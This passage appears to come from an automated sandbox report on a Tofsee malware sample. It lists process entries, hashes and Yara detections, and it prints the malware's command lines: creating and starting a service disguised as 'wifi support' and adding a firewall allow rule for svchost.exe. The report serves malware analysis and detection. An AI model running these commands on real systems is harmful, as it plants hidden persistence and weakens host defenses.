                                                                                                                        Start time:19:09:33
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                                                        Imagebase:0x8c0000
                                                                                                                        File size:60928 bytes
                                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: conhost.exe PID: 5992 Parent PID: 5984

                                                                                                                        General

                                                                                                                        Start time:19:09:34
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: sc.exe PID: 2076 Parent PID: 5196

                                                                                                                        General

                                                                                                                        Start time:19:09:34
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\System32\sc.exe" description ceaplexz "wifi internet conection
                                                                                                                        Imagebase:0x8c0000
                                                                                                                        File size:60928 bytes
                                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: conhost.exe PID: 6116 Parent PID: 2076

                                                                                                                        General

                                                                                                                        Start time:19:09:36
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: sc.exe PID: 484 Parent PID: 5196

                                                                                                                        General

                                                                                                                        Start time:19:09:36
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\sc.exe" start ceaplexz
                                                                                                                        Imagebase:0x8c0000
                                                                                                                        File size:60928 bytes
                                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: conhost.exe PID: 5188 Parent PID: 484

                                                                                                                        General

                                                                                                                        Start time:19:09:38
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: netsh.exe PID: 4864 Parent PID: 5196

                                                                                                                        General

                                                                                                                        Start time:19:09:39
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                        Imagebase:0x11f0000
                                                                                                                        File size:82944 bytes
                                                                                                                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: evjgtzc.exe PID: 4876 Parent PID: 556

                                                                                                                        General

                                                                                                                        Start time:19:09:39
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d"C:\Users\user\AppData\Local\Temp\77CC.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:14218752 bytes
                                                                                                                        MD5 hash:BBB91EAF2FB4CC1AA911FF4D555EC36D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002B.00000003.399149809.0000000000620000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002B.00000002.401571286.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002B.00000002.402320315.0000000000660000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002B.00000002.402219986.0000000000600000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                        Analysis Process: conhost.exe PID: 5268 Parent PID: 4864

                                                                                                                        General

                                                                                                                        Start time:19:09:39
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: svchost.exe PID: 4020 Parent PID: 4876

                                                                                                                        General

                                                                                                                        Start time:19:09:41
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:svchost.exe
                                                                                                                        Imagebase:0xed0000
                                                                                                                        File size:44520 bytes
                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002D.00000002.552204136.0000000002EE0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                        Disassembly

                                                                                                                        Code Analysis

                                                                                                                        Reset < >